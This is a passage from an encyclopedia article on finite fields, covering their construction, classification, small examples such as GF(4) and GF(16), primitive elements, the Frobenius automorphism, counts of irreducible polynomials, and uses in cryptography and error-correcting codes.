The simplest examples of finite fields are the fields of prime order: for eachprime numberp{\displaystyle p}, theprime fieldof orderp{\displaystyle p}may be constructed as theintegers modulop{\displaystyle p},Z/pZ{\displaystyle \mathbb {Z} /p\mathbb {Z} }.[1]
The elements of the prime field of orderp{\displaystyle p}may be represented by integers in the range0,…,p−1{\displaystyle 0,\ldots ,p-1}. The sum, the difference and the product are theremainder of the divisionbyp{\displaystyle p}of the result of the corresponding integer operation.[1]The multiplicative inverse of an element may be computed by using the extended Euclidean algorithm (seeExtended Euclidean algorithm § Modular integers).[citation needed]
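A hedged sketch of the prime-field inverse described here, computed with the extended Euclidean algorithm (the function name is ours):

```python
def inverse_mod(x, p):
    """Multiplicative inverse of x in GF(p), computed with the
    extended Euclidean algorithm."""
    if x % p == 0:
        raise ZeroDivisionError("0 has no multiplicative inverse")
    r0, r1 = p, x % p          # remainder sequence
    s0, s1 = 0, 1              # Bezout coefficients of x
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    return s0 % p              # s0 * x = gcd = 1 (mod p)
```

For example, the inverse of 3 in GF(7) is 5, since 3 · 5 = 15 ≡ 1 (mod 7).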
LetF{\displaystyle F}be a finite field. For any elementx{\displaystyle x}inF{\displaystyle F}and anyintegern{\displaystyle n}, denote byn⋅x{\displaystyle n\cdot x}the sum ofn{\displaystyle n}copies ofx{\displaystyle x}. The least positiven{\displaystyle n}such thatn⋅1=0{\displaystyle n\cdot 1=0}is the characteristicp{\displaystyle p}of the field.[1]This allows defining a multiplication(k,x)↦k⋅x{\displaystyle (k,x)\mapsto k\cdot x}of an elementk{\displaystyle k}ofGF(p){\displaystyle \mathrm {GF} (p)}by an elementx{\displaystyle x}ofF{\displaystyle F}by choosing an integer representative fork{\displaystyle k}. This multiplication makesF{\displaystyle F}into aGF(p){\displaystyle \mathrm {GF} (p)}-vector space.[1]It follows that the number of elements ofF{\displaystyle F}ispn{\displaystyle p^{n}}for some integern{\displaystyle n}.[1]
Theidentity(x+y)p=xp+yp{\displaystyle (x+y)^{p}=x^{p}+y^{p}}(sometimes called thefreshman's dream) is true in a field of characteristicp{\displaystyle p}. This follows from thebinomial theorem, as eachbinomial coefficientof the expansion of(x+y)p{\displaystyle (x+y)^{p}}, except the first and the last, is a multiple ofp{\displaystyle p}.[citation needed]
ByFermat's little theorem, ifp{\displaystyle p}is a prime number andx{\displaystyle x}is in the fieldGF(p){\displaystyle \mathrm {GF} (p)}thenxp=x{\displaystyle x^{p}=x}. This implies the equalityXp−X=∏a∈GF(p)(X−a){\displaystyle X^{p}-X=\prod _{a\in \mathrm {GF} (p)}(X-a)}for polynomials overGF(p){\displaystyle \mathrm {GF} (p)}. More generally, every element inGF(pn){\displaystyle \mathrm {GF} (p^{n})}satisfies the polynomial equationxpn−x=0{\displaystyle x^{p^{n}}-x=0}.[citation needed]
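Both statements can be verified computationally for a small prime, say p = 5: every element satisfies x^p = x, and expanding the product ∏(X−a) over GF(p) recovers X^p − X. The helper below is an illustrative sketch.

```python
def poly_mul(f, g, p):
    # Multiply polynomials over GF(p); coefficient lists, lowest degree first.
    out = [0] * (len(f) + len(g) - 1)
    for i, fi in enumerate(f):
        for j, gj in enumerate(g):
            out[i + j] = (out[i + j] + fi * gj) % p
    return out

p = 5
assert all(pow(x, p, p) == x for x in range(p))  # Fermat: x^p = x in GF(p)

prod = [1]
for a in range(p):
    prod = poly_mul(prod, [(-a) % p, 1], p)      # multiply by (X - a)

# X^p - X over GF(p): coefficient -1 (= p - 1) at degree 1, 1 at degree p.
assert prod == [0, p - 1] + [0] * (p - 2) + [1]
```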
Any finitefield extensionof a finite field isseparableand simple. That is, ifE{\displaystyle E}is a finite field andF{\displaystyle F}is a subfield ofE{\displaystyle E}, thenE{\displaystyle E}is obtained fromF{\displaystyle F}by adjoining a single element whoseminimal polynomialisseparable. To use a piece of jargon, finite fields areperfect.[1]
A more generalalgebraic structurethat satisfies all the other axioms of a field, but whose multiplication is not required to becommutative, is called adivision ring(or sometimesskew field). ByWedderburn's little theorem, any finite division ring is commutative, and hence is a finite field.[1]
Letq=pn{\displaystyle q=p^{n}}be aprime power, andF{\displaystyle F}be thesplitting fieldof the polynomialP=Xq−X{\displaystyle P=X^{q}-X}over the prime fieldGF(p){\displaystyle \mathrm {GF} (p)}. This means thatF{\displaystyle F}is a finite field of lowest order, in whichP{\displaystyle P}hasq{\displaystyle q}distinct roots (theformal derivativeofP{\displaystyle P}isP′=−1{\displaystyle P'=-1}, implying thatgcd(P,P′)=1{\displaystyle \mathrm {gcd} (P,P')=1}, which in general implies that the splitting field is aseparable extensionof the original). Theabove identityshows that the sum and the product of two roots ofP{\displaystyle P}are roots ofP{\displaystyle P}, as well as the multiplicative inverse of a root ofP{\displaystyle P}. In other words, the roots ofP{\displaystyle P}form a field of orderq{\displaystyle q}, which is equal toF{\displaystyle F}by the minimality of the splitting field.
The uniqueness up to isomorphism of splitting fields implies thus that all fields of orderq{\displaystyle q}are isomorphic. Also, if a fieldF{\displaystyle F}has a field of orderq=pk{\displaystyle q=p^{k}}as a subfield, its elements are theq{\displaystyle q}roots ofXq−X{\displaystyle X^{q}-X}, andF{\displaystyle F}cannot contain another subfield of orderq{\displaystyle q}.
In summary, we have the following classification theorem first proved in 1893 byE. H. Moore:[2]
The order of a finite field is a prime power. For every prime powerq{\displaystyle q}there are fields of orderq{\displaystyle q}, and they are all isomorphic. In these fields, every element satisfiesxq=x,{\displaystyle x^{q}=x,}and the polynomialXq−X{\displaystyle X^{q}-X}factors asXq−X=∏a∈F(X−a).{\displaystyle X^{q}-X=\prod _{a\in F}(X-a).}
It follows thatGF(pn){\displaystyle \mathrm {GF} (p^{n})}contains a subfield isomorphic toGF(pm){\displaystyle \mathrm {GF} (p^{m})}if and only ifm{\displaystyle m}is a divisor ofn{\displaystyle n}; in that case, this subfield is unique. In fact, the polynomialXpm−X{\displaystyle X^{p^{m}}-X}dividesXpn−X{\displaystyle X^{p^{n}}-X}if and only ifm{\displaystyle m}is a divisor ofn{\displaystyle n}.
Given a prime powerq=pn{\displaystyle q=p^{n}}withp{\displaystyle p}prime andn>1{\displaystyle n>1}, the fieldGF(q){\displaystyle \mathrm {GF} (q)}may be explicitly constructed in the following way. One first chooses anirreducible polynomialP{\displaystyle P}inGF(p)[X]{\displaystyle \mathrm {GF} (p)[X]}of degreen{\displaystyle n}(such an irreducible polynomial always exists). Then thequotient ringGF(q)=GF(p)[X]/(P){\displaystyle \mathrm {GF} (q)=\mathrm {GF} (p)[X]/(P)}of the polynomial ringGF(p)[X]{\displaystyle \mathrm {GF} (p)[X]}by the ideal generated byP{\displaystyle P}is a field of orderq{\displaystyle q}.
More explicitly, the elements ofGF(q){\displaystyle \mathrm {GF} (q)}are the polynomials overGF(p){\displaystyle \mathrm {GF} (p)}whose degree is strictly less thann{\displaystyle n}. The addition and the subtraction are those of polynomials overGF(p){\displaystyle \mathrm {GF} (p)}. The product of two elements is the remainder of theEuclidean divisionbyP{\displaystyle P}of the product inGF(q)[X]{\displaystyle \mathrm {GF} (q)[X]}.
The multiplicative inverse of a non-zero element may be computed with the extended Euclidean algorithm; seeExtended Euclidean algorithm § Simple algebraic field extensions.
However, with this representation, elements ofGF(q){\displaystyle \mathrm {GF} (q)}may be difficult to distinguish from the corresponding polynomials. Therefore, it is common to give a name, commonlyα{\displaystyle \alpha }to the element ofGF(q){\displaystyle \mathrm {GF} (q)}that corresponds to the polynomialX{\displaystyle X}. So, the elements ofGF(q){\displaystyle \mathrm {GF} (q)}become polynomials inα{\displaystyle \alpha }, whereP(α)=0{\displaystyle P(\alpha )=0}, and, when one encounters a polynomial inα{\displaystyle \alpha }of degree greater or equal ton{\displaystyle n}(for example after a multiplication), one knows that one has to use the relationP(α)=0{\displaystyle P(\alpha )=0}to reduce its degree (it is what Euclidean division is doing).
Except in the construction ofGF(4){\displaystyle \mathrm {GF} (4)}, there are several possible choices forP{\displaystyle P}, which produce isomorphic results. To simplify the Euclidean division, one commonly chooses forP{\displaystyle P}a polynomial of the formXn+aX+b,{\displaystyle X^{n}+aX+b,}which makes the needed Euclidean divisions very efficient. However, for some fields, typically in characteristic2{\displaystyle 2}, irreducible polynomials of the formXn+aX+b{\displaystyle X^{n}+aX+b}may not exist. In characteristic2{\displaystyle 2}, if the polynomialXn+X+1{\displaystyle X^{n}+X+1}is reducible, it is recommended to chooseXn+Xk+1{\displaystyle X^{n}+X^{k}+1}with the lowest possiblek{\displaystyle k}that makes the polynomial irreducible. If all thesetrinomialsare reducible, one chooses "pentanomials"Xn+Xa+Xb+Xc+1{\displaystyle X^{n}+X^{a}+X^{b}+X^{c}+1}, as polynomials of degree greater than1{\displaystyle 1}, with an even number of terms, are never irreducible in characteristic2{\displaystyle 2}, having1{\displaystyle 1}as a root.[4]
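As an illustration of the quotient construction with a trinomial in characteristic 2, the sketch below implements GF(8) = GF(2)[X]/(X³+X+1), representing elements as integers whose bits are polynomial coefficients; the function name and encoding are ours.

```python
def gf2n_mul(a, b, modulus, n):
    """Multiply elements of GF(2^n) given as integers whose bits are
    polynomial coefficients, reducing by the irreducible polynomial
    `modulus` (also encoded as a bit mask)."""
    result = 0
    while b:
        if b & 1:
            result ^= a          # add a (XOR = addition in characteristic 2)
        b >>= 1
        a <<= 1                  # multiply a by X
        if (a >> n) & 1:
            a ^= modulus         # reduce modulo the irreducible polynomial
    return result

# GF(8) with P = X^3 + X + 1, encoded as 0b1011; alpha is 0b010.
MOD, N = 0b1011, 3
x, powers = 1, set()
for _ in range(7):
    x = gf2n_mul(x, 0b010, MOD, N)
    powers.add(x)
assert x == 1                      # alpha has multiplicative order 7
assert powers == set(range(1, 8))  # alpha generates all nonzero elements
```

Since X³ + X + 1 is primitive, α is a primitive element and its powers run through all seven nonzero elements of GF(8).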
A possible choice for such a polynomial is given byConway polynomials. They ensure a certain compatibility between the representation of a field and the representations of its subfields.
In the next sections, we will show how the general construction method outlined above works for small finite fields.
The smallest non-prime field is the field with four elements, which is commonly denotedGF(4){\displaystyle \mathrm {GF} (4)}orF4.{\displaystyle \mathbb {F} _{4}.}It consists of the four elements0,1,α,1+α{\displaystyle 0,1,\alpha ,1+\alpha }such thatα2=1+α{\displaystyle \alpha ^{2}=1+\alpha },1⋅α=α⋅1=α{\displaystyle 1\cdot \alpha =\alpha \cdot 1=\alpha },x+x=0{\displaystyle x+x=0}, andx⋅0=0⋅x=0{\displaystyle x\cdot 0=0\cdot x=0}, for everyx∈GF(4){\displaystyle x\in \mathrm {GF} (4)}, the other operation results being easily deduced from thedistributive law. See below for the complete operation tables.
This may be deduced as follows from the results of the preceding section.
OverGF(2){\displaystyle \mathrm {GF} (2)}, there is only oneirreducible polynomialof degree2{\displaystyle 2}:X2+X+1{\displaystyle X^{2}+X+1}Therefore, forGF(4){\displaystyle \mathrm {GF} (4)}the construction of the preceding section must involve this polynomial, andGF(4)=GF(2)[X]/(X2+X+1).{\displaystyle \mathrm {GF} (4)=\mathrm {GF} (2)[X]/(X^{2}+X+1).}Letα{\displaystyle \alpha }denote a root of this polynomial inGF(4){\displaystyle \mathrm {GF} (4)}. This implies thatα2=1+α,{\displaystyle \alpha ^{2}=1+\alpha ,}and thatα{\displaystyle \alpha }and1+α{\displaystyle 1+\alpha }are the elements ofGF(4){\displaystyle \mathrm {GF} (4)}that are not inGF(2){\displaystyle \mathrm {GF} (2)}. The tables of the operations inGF(4){\displaystyle \mathrm {GF} (4)}result from this, and are as follows:
A table for subtraction is not given, because subtraction is identical to addition, as is the case for every field of characteristic 2.
In the third table, for the division ofx{\displaystyle x}byy{\displaystyle y}, the values ofx{\displaystyle x}must be read in the left column, and the values ofy{\displaystyle y}in the top row. (Because0⋅z=0{\displaystyle 0\cdot z=0}for everyz{\displaystyle z}in everyringthedivision by 0has to remain undefined.) From the tables, it can be seen that the additive structure ofGF(4){\displaystyle \mathrm {GF} (4)}is isomorphic to theKlein four-group, while the non-zero multiplicative structure is isomorphic to the groupZ3{\displaystyle Z_{3}}.
The mapφ:x↦x2{\displaystyle \varphi :x\mapsto x^{2}}is the non-trivial field automorphism, called theFrobenius automorphism, which sendsα{\displaystyle \alpha }into the second root1+α{\displaystyle 1+\alpha }of the above-mentioned irreducible polynomialX2+X+1{\displaystyle X^{2}+X+1}.
For applying theabove general constructionof finite fields in the case ofGF(p2){\displaystyle \mathrm {GF} (p^{2})}, one has to find an irreducible polynomial of degree 2. Forp=2{\displaystyle p=2}, this has been done in the preceding section. Ifp{\displaystyle p}is an odd prime, there are always irreducible polynomials of the formX2−r{\displaystyle X^{2}-r}, withr{\displaystyle r}inGF(p){\displaystyle \mathrm {GF} (p)}.
More precisely, the polynomialX2−r{\displaystyle X^{2}-r}is irreducible overGF(p){\displaystyle \mathrm {GF} (p)}if and only ifr{\displaystyle r}is aquadratic non-residuemodulop{\displaystyle p}(this is almost the definition of a quadratic non-residue). There arep−12{\displaystyle {\frac {p-1}{2}}}quadratic non-residues modulop{\displaystyle p}. For example,2{\displaystyle 2}is a quadratic non-residue forp=3,5,11,13,…{\displaystyle p=3,5,11,13,\ldots }, and3{\displaystyle 3}is a quadratic non-residue forp=5,7,17,…{\displaystyle p=5,7,17,\ldots }. Ifp≡3mod4{\displaystyle p\equiv 3\mod 4}, that isp=3,7,11,19,…{\displaystyle p=3,7,11,19,\ldots }, one may choose−1≡p−1{\displaystyle -1\equiv p-1}as a quadratic non-residue, which allows us to have a very simple irreducible polynomialX2+1{\displaystyle X^{2}+1}.
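Quadratic non-residues can be recognized with Euler's criterion: for an odd prime p, r is a non-residue if and only if r^((p−1)/2) ≡ −1 (mod p). A one-function sketch (the name is ours):

```python
def is_quadratic_nonresidue(r, p):
    # Euler's criterion for an odd prime p and r not divisible by p.
    return pow(r, (p - 1) // 2, p) == p - 1

# The examples listed above:
assert all(is_quadratic_nonresidue(2, p) for p in (3, 5, 11, 13))
assert all(is_quadratic_nonresidue(3, p) for p in (5, 7, 17))
```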
Having chosen a quadratic non-residue r, let α be a symbolic square root of r, that is, a symbol that has the property α^2 = r, in the same way that the complex number i is a symbolic square root of −1. Then, the elements of GF(p^2) are all the linear expressions a + bα, with a and b in GF(p). The operations on GF(p^2) are defined as follows (the operations between elements of GF(p) represented by Latin letters are the operations in GF(p)):
{\displaystyle {\begin{aligned}-(a+b\alpha )&=-a+(-b)\alpha \\(a+b\alpha )+(c+d\alpha )&=(a+c)+(b+d)\alpha \\(a+b\alpha )(c+d\alpha )&=(ac+rbd)+(ad+bc)\alpha \\(a+b\alpha )^{-1}&=a(a^{2}-rb^{2})^{-1}+(-b)(a^{2}-rb^{2})^{-1}\alpha \end{aligned}}}
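The four operations above translate directly into code. A minimal sketch (the function names and the choice p = 7, r = 3 are ours; 3 is a quadratic non-residue mod 7), representing a + bα as the pair (a, b):

```python
# Arithmetic in GF(p^2) with elements a + b*alpha, where alpha^2 = r
# and r is a quadratic non-residue mod p.
p, r = 7, 3

def add(x, y):
    return ((x[0] + y[0]) % p, (x[1] + y[1]) % p)

def mul(x, y):
    a, b = x
    c, d = y
    return ((a * c + r * b * d) % p, (a * d + b * c) % p)

def inv(x):
    a, b = x
    n = pow(a * a - r * b * b, -1, p)  # (a^2 - r*b^2)^(-1) computed in GF(p)
    return (a * n % p, -b * n % p)

x = (2, 5)
assert mul(x, inv(x)) == (1, 0)  # x * x^(-1) = 1
```

The inverse formula works because (a + bα)(a − bα) = a^2 − rb^2 lies in GF(p) and is nonzero when (a, b) ≠ (0, 0), since r has no square root in GF(p).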
The polynomial X^3 − X − 1 is irreducible over GF(2) and GF(3), that is, it is irreducible modulo 2 and 3 (to show this, it suffices to show that it has no root in GF(2) nor in GF(3)). It follows that the elements of GF(8) and GF(27) may be represented by expressions a + bα + cα^2, where a, b, c are elements of GF(2) or GF(3) (respectively), and α is a symbol such that α^3 = α + 1.
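Since a polynomial of degree 2 or 3 is irreducible over a field exactly when it has no root there, the irreducibility claim can be checked by brute force (the helper name is ours):

```python
# A cubic over GF(p) is irreducible iff it has no root in GF(p).
def has_root(p: int) -> bool:
    return any((x**3 - x - 1) % p == 0 for x in range(p))

assert not has_root(2) and not has_root(3)  # irreducible mod 2 and mod 3
assert has_root(5)                          # but X^3 - X - 1 has the root 2 mod 5
```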
The addition, additive inverse and multiplication on GF(8) and GF(27) may thus be defined as follows; in the following formulas, the operations between elements of GF(2) or GF(3), represented by Latin letters, are the operations in GF(2) or GF(3), respectively:
{\displaystyle {\begin{aligned}-(a+b\alpha +c\alpha ^{2})&=-a+(-b)\alpha +(-c)\alpha ^{2}\qquad {\text{(for }}\mathrm {GF} (8),{\text{this operation is the identity)}}\\(a+b\alpha +c\alpha ^{2})+(d+e\alpha +f\alpha ^{2})&=(a+d)+(b+e)\alpha +(c+f)\alpha ^{2}\\(a+b\alpha +c\alpha ^{2})(d+e\alpha +f\alpha ^{2})&=(ad+bf+ce)+(ae+bd+bf+ce+cf)\alpha +(af+be+cd+cf)\alpha ^{2}\end{aligned}}}
The polynomial X^4 + X + 1 is irreducible over GF(2), that is, it is irreducible modulo 2. It follows that the elements of GF(16) may be represented by expressions a + bα + cα^2 + dα^3, where a, b, c, d are either 0 or 1 (elements of GF(2)), and α is a symbol such that α^4 = α + 1 (that is, α is defined as a root of the given irreducible polynomial). As the characteristic of GF(2) is 2, each element is its additive inverse in GF(16). The addition and multiplication on GF(16) may be defined as follows; in the following formulas, the operations between elements of GF(2), represented by Latin letters, are the operations in GF(2):
{\displaystyle {\begin{aligned}(a+b\alpha +c\alpha ^{2}+d\alpha ^{3})+(e+f\alpha +g\alpha ^{2}+h\alpha ^{3})&=(a+e)+(b+f)\alpha +(c+g)\alpha ^{2}+(d+h)\alpha ^{3}\\(a+b\alpha +c\alpha ^{2}+d\alpha ^{3})(e+f\alpha +g\alpha ^{2}+h\alpha ^{3})&=(ae+bh+cg+df)+(af+be+bh+cg+df+ch+dg)\alpha \;+\\&\quad \;(ag+bf+ce+ch+dg+dh)\alpha ^{2}+(ah+bg+cf+de+dh)\alpha ^{3}\end{aligned}}}
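Packing the coefficients (a, b, c, d) into the bits of an integer, multiplication in GF(16) becomes a carry-less (XOR) product followed by reduction using α^4 = α + 1. A Python sketch (our own, not from the article):

```python
# GF(16) elements as 4-bit ints: bit i holds the coefficient of alpha^i.
# Reduction uses alpha^4 = alpha + 1, i.e. the mask 0b10011 for X^4 + X + 1.
def gf16_mul(x: int, y: int) -> int:
    z = 0
    for i in range(4):            # carry-less multiplication: shifted XORs
        if (y >> i) & 1:
            z ^= x << i
    for i in range(6, 3, -1):     # reduce degrees 6, 5, 4 down into degrees < 4
        if (z >> i) & 1:
            z ^= 0b10011 << (i - 4)
    return z

alpha = 0b0010
assert gf16_mul(alpha, alpha) == 0b0100       # alpha^2
assert gf16_mul(0b1000, alpha) == 0b0011      # alpha^3 * alpha = alpha + 1

# alpha generates all 15 nonzero elements, so it is a primitive element
seen, x = set(), 1
for _ in range(15):
    x = gf16_mul(x, alpha)
    seen.add(x)
assert len(seen) == 15
```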
The field GF(16) has eight primitive elements (the elements that have all nonzero elements of GF(16) as integer powers). These elements are the four roots of X^4 + X + 1 and their multiplicative inverses. In particular, α is a primitive element, and the primitive elements are α^m with m less than and coprime with 15 (that is, 1, 2, 4, 7, 8, 11, 13, 14).
The set of non-zero elements in GF(q) is an abelian group under multiplication, of order q − 1. By Lagrange's theorem, there exists a divisor k of q − 1 such that x^k = 1 for every non-zero x in GF(q). As the equation x^k = 1 has at most k solutions in any field, q − 1 is the lowest possible value for k.
The structure theorem of finite abelian groups implies that this multiplicative group is cyclic, that is, all non-zero elements are powers of a single element. In summary:
Such an element a is called a primitive element of GF(q). Unless q = 2, 3, the primitive element is not unique. The number of primitive elements is ϕ(q − 1) where ϕ is Euler's totient function.
The result above implies that x^q = x for every x in GF(q). The particular case where q is prime is Fermat's little theorem.
If a is a primitive element in GF(q), then for any non-zero element x in GF(q), there is a unique integer n with 0 ≤ n ≤ q − 2 such that x = a^n.
This integer n is called the discrete logarithm of x to the base a.
While a^n can be computed very quickly, for example using exponentiation by squaring, there is no known efficient algorithm for computing the inverse operation, the discrete logarithm. This has been used in various cryptographic protocols; see Discrete logarithm for details.
When the nonzero elements of GF(q) are represented by their discrete logarithms, multiplication and division are easy, as they reduce to addition and subtraction modulo q − 1. However, addition amounts to computing the discrete logarithm of a^m + a^n. The identity a^m + a^n = a^n(a^{m−n} + 1) allows one to solve this problem by constructing the table of the discrete logarithms of a^n + 1, called Zech's logarithms, for n = 0, …, q − 2 (it is convenient to define the discrete logarithm of zero as being −∞).
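The construction can be sketched in a small prime field; here we take GF(7) with primitive element 3, and encode the convention log 0 = −∞ as None:

```python
# Zech's logarithms in GF(7) with primitive element a = 3:
# Z(n) = log(a^n + 1), so that a^m + a^n = a^(n + Z(m-n)).
q, a = 7, 3
log = {pow(a, n, q): n for n in range(q - 1)}   # discrete logarithm table
zech = {n: log.get((pow(a, n, q) + 1) % q)      # None encodes log 0 = -infinity
        for n in range(q - 1)}

def add_via_logs(m, n):
    """Return log(a^m + a^n), or None if the sum is zero."""
    z = zech[(m - n) % (q - 1)]
    return None if z is None else (n + z) % (q - 1)

assert add_via_logs(4, 2) == 3        # a^4 + a^2 = 4 + 2 = 6 = a^3 in GF(7)
assert add_via_logs(4, 1) is None     # a^4 + a^1 = 4 + 3 = 0
```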
Zech's logarithms are useful for large computations, such as linear algebra over medium-sized fields, that is, fields that are sufficiently large for making natural algorithms inefficient, but not too large, as one has to pre-compute a table of the same size as the order of the field.
Every nonzero element of a finite field is a root of unity, as x^{q−1} = 1 for every nonzero element of GF(q).
If n is a positive integer, an nth primitive root of unity is a solution of the equation x^n = 1 that is not a solution of the equation x^m = 1 for any positive integer m < n. If a is an nth primitive root of unity in a field F, then F contains all the n roots of unity, which are 1, a, a^2, …, a^{n−1}.
The field GF(q) contains an nth primitive root of unity if and only if n is a divisor of q − 1; if n is a divisor of q − 1, then the number of primitive nth roots of unity in GF(q) is ϕ(n) (Euler's totient function). The number of nth roots of unity in GF(q) is gcd(n, q − 1).
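The gcd formula is easy to verify by brute force in a prime field, for example GF(13), where the field elements are just the integers 1, …, 12 under arithmetic mod 13:

```python
# In GF(13), the number of solutions of x^n = 1 equals gcd(n, q - 1) = gcd(n, 12).
from math import gcd

q = 13
for n in range(1, 20):
    count = sum(1 for x in range(1, q) if pow(x, n, q) == 1)
    assert count == gcd(n, q - 1)
```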
In a field of characteristic p, every (np)th root of unity is also an nth root of unity. It follows that primitive (np)th roots of unity never exist in a field of characteristic p.
On the other hand, if n is coprime to p, the roots of the nth cyclotomic polynomial are distinct in every field of characteristic p, as this polynomial is a divisor of X^n − 1, whose discriminant n^n is nonzero modulo p. It follows that the nth cyclotomic polynomial factors over GF(p) into distinct irreducible polynomials that all have the same degree, say d, and that GF(p^d) is the smallest field of characteristic p that contains the nth primitive roots of unity.
When computing Brauer characters, one uses the map α^k ↦ exp(2πik/(q−1)) to map eigenvalues of a representation matrix to the complex numbers. Under this mapping, the base subfield GF(p) consists of evenly spaced points around the unit circle (omitting zero).
The field GF(64) has several interesting properties that smaller fields do not share: it has two subfields such that neither is contained in the other; not all generators (elements with minimal polynomial of degree 6 over GF(2)) are primitive elements; and the primitive elements are not all conjugate under the Galois group.
The order of this field being 2^6, and the divisors of 6 being 1, 2, 3, 6, the subfields of GF(64) are GF(2), GF(2^2) = GF(4), GF(2^3) = GF(8), and GF(64) itself. As 2 and 3 are coprime, the intersection of GF(4) and GF(8) in GF(64) is the prime field GF(2).
The union of GF(4) and GF(8) has thus 10 elements. The remaining 54 elements of GF(64) generate GF(64) in the sense that no other subfield contains any of them. It follows that they are roots of irreducible polynomials of degree 6 over GF(2). This implies that, over GF(2), there are exactly 9 = 54/6 irreducible monic polynomials of degree 6. This may be verified by factoring X^64 − X over GF(2).
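The count 9 can also be checked computationally. The sketch below (our own, not the factorization of X^64 − X itself) encodes polynomials over GF(2) as bit masks and sieves out every reducible monic polynomial of degree 6:

```python
# Count monic irreducible polynomials of degree 6 over GF(2).
# A polynomial is a bit mask: bit i is the coefficient of X^i.
def polymul2(a: int, b: int) -> int:
    """Carry-less product = polynomial product over GF(2)."""
    z = 0
    while b:
        if b & 1:
            z ^= a
        b >>= 1
        a <<= 1
    return z

reducible = set()
for a in range(2, 1 << 6):          # all polynomials of degree 1..5
    for b in range(2, 1 << 6):
        p = polymul2(a, b)
        if 1 << 6 <= p < 1 << 7:    # keep products of degree exactly 6
            reducible.add(p)

irreducible = [p for p in range(1 << 6, 1 << 7) if p not in reducible]
assert len(irreducible) == 9        # matches 54 / 6 from the text
assert 0b1000011 in irreducible     # X^6 + X + 1 is one of them
```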
The elements of GF(64) are primitive nth roots of unity for some n dividing 63. As the 3rd and the 7th roots of unity belong to GF(4) and GF(8), respectively, the 54 generators are primitive nth roots of unity for some n in {9, 21, 63}. Euler's totient function shows that there are 6 primitive 9th roots of unity, 12 primitive 21st roots of unity, and 36 primitive 63rd roots of unity. Summing these numbers, one finds again 54 elements.
By factoring the cyclotomic polynomials over GF(2), one finds that:
This shows that the best choice to construct GF(64) is to define it as GF(2)[X] / (X^6 + X + 1). In fact, a root of X^6 + X + 1 is a primitive element, and this polynomial is the irreducible polynomial that produces the easiest Euclidean division.
In this section, p is a prime number, and q = p^n is a power of p.
In GF(q), the identity (x + y)^p = x^p + y^p implies that the map φ : x ↦ x^p is a GF(p)-linear endomorphism and a field automorphism of GF(q), which fixes every element of the subfield GF(p). It is called the Frobenius automorphism, after Ferdinand Georg Frobenius.
Denoting by φ^k the composition of φ with itself k times, we have φ^k : x ↦ x^{p^k}. It has been shown in the preceding section that φ^n is the identity. For 0 < k < n, the automorphism φ^k is not the identity, as, otherwise, the polynomial X^{p^k} − X would have more than p^k roots.
There are no other GF(p)-automorphisms of GF(q). In other words, GF(p^n) has exactly n GF(p)-automorphisms, which are Id = φ^0, φ, φ^2, …, φ^{n−1}.
In terms of Galois theory, this means that GF(p^n) is a Galois extension of GF(p), which has a cyclic Galois group.
The fact that the Frobenius map is surjective implies that every finite field is perfect.
If F is a finite field, a non-constant monic polynomial with coefficients in F is irreducible over F if it is not the product of two non-constant monic polynomials with coefficients in F.
As every polynomial ring over a field is a unique factorization domain, every monic polynomial over a finite field may be factored in a unique way (up to the order of the factors) into a product of irreducible monic polynomials.
There are efficient algorithms for testing polynomial irreducibility and factoring polynomials over finite fields. They are a key step for factoring polynomials over the integers or the rational numbers. At least for this reason, every computer algebra system has functions for factoring polynomials over finite fields, or at least over finite prime fields.
The polynomial X^q − X factors into linear factors over a field of order q. More precisely, this polynomial is the product of all monic polynomials of degree one over a field of order q.
This implies that, if q = p^n, then X^q − X is the product of all monic irreducible polynomials over GF(p) whose degree divides n. In fact, if P is an irreducible factor over GF(p) of X^q − X, its degree divides n, as its splitting field is contained in GF(p^n). Conversely, if P is an irreducible monic polynomial over GF(p) of degree d dividing n, it defines a field extension of degree d, which is contained in GF(p^n), and all roots of P belong to GF(p^n) and are roots of X^q − X; thus P divides X^q − X. As X^q − X does not have any multiple factor, it is thus the product of all the irreducible monic polynomials that divide it.
This property is used to compute the product of the irreducible factors of each degree of polynomials over GF(p); see Distinct degree factorization.
The number N(q, n) of monic irreducible polynomials of degree n over GF(q) is given by[5]
{\displaystyle N(q,n)={\frac {1}{n}}\sum _{d\mid n}\mu (d)q^{n/d},}
where μ is the Möbius function. This formula is an immediate consequence of the property of X^q − X above and the Möbius inversion formula.
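The formula is straightforward to implement; the sketch below (helper names are ours) recomputes, among other values, the count of 9 monic irreducible polynomials of degree 6 over GF(2):

```python
# N(q, n) = (1/n) * sum over divisors d of n of mu(d) * q^(n/d)
def mobius(n: int) -> int:
    """Moebius function via trial division."""
    result, d = 1, 2
    while d * d <= n:
        if n % d == 0:
            n //= d
            if n % d == 0:
                return 0          # squared prime factor
            result = -result
        d += 1
    return -result if n > 1 else result

def num_irreducible(q: int, n: int) -> int:
    return sum(mobius(d) * q ** (n // d) for d in range(1, n + 1) if n % d == 0) // n

assert num_irreducible(2, 6) == 9    # (64 - 8 - 4 + 2) / 6
assert num_irreducible(2, 1) == 2    # X and X + 1
assert num_irreducible(3, 2) == 3    # (9 - 3) / 2
```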
By the above formula, the number of irreducible (not necessarily monic) polynomials of degree n over GF(q) is (q − 1)N(q, n).
The exact formula implies the inequality
{\displaystyle N(q,n)\geq {\frac {1}{n}}\left(q^{n}-\sum _{\ell \mid n,\ \ell {\text{ prime}}}q^{n/\ell }\right);}
this is sharp if and only if n is a power of some prime.
For every q and every n, the right-hand side is positive, so there is at least one irreducible polynomial of degree n over GF(q).
In cryptography, the difficulty of the discrete logarithm problem in finite fields or in elliptic curves is the basis of several widely used protocols, such as the Diffie–Hellman protocol. For example, in 2014, a secure internet connection to Wikipedia involved the elliptic curve Diffie–Hellman protocol (ECDHE) over a large finite field.[6] In coding theory, many codes are constructed as subspaces of vector spaces over finite fields.
Finite fields are used by many error correction codes, such as the Reed–Solomon error correction code or the BCH code. The finite field almost always has characteristic 2, since computer data is stored in binary. For example, a byte of data can be interpreted as an element of GF(2^8). One exception is the PDF417 bar code, which uses GF(929). Some CPUs have special instructions that can be useful for finite fields of characteristic 2, generally variations of the carry-less product.
Finite fields are widely used in number theory, as many problems over the integers may be solved by reducing them modulo one or several prime numbers. For example, the fastest known algorithms for polynomial factorization and linear algebra over the field of rational numbers proceed by reduction modulo one or several primes, and then reconstruction of the solution by using the Chinese remainder theorem, Hensel lifting or the LLL algorithm.
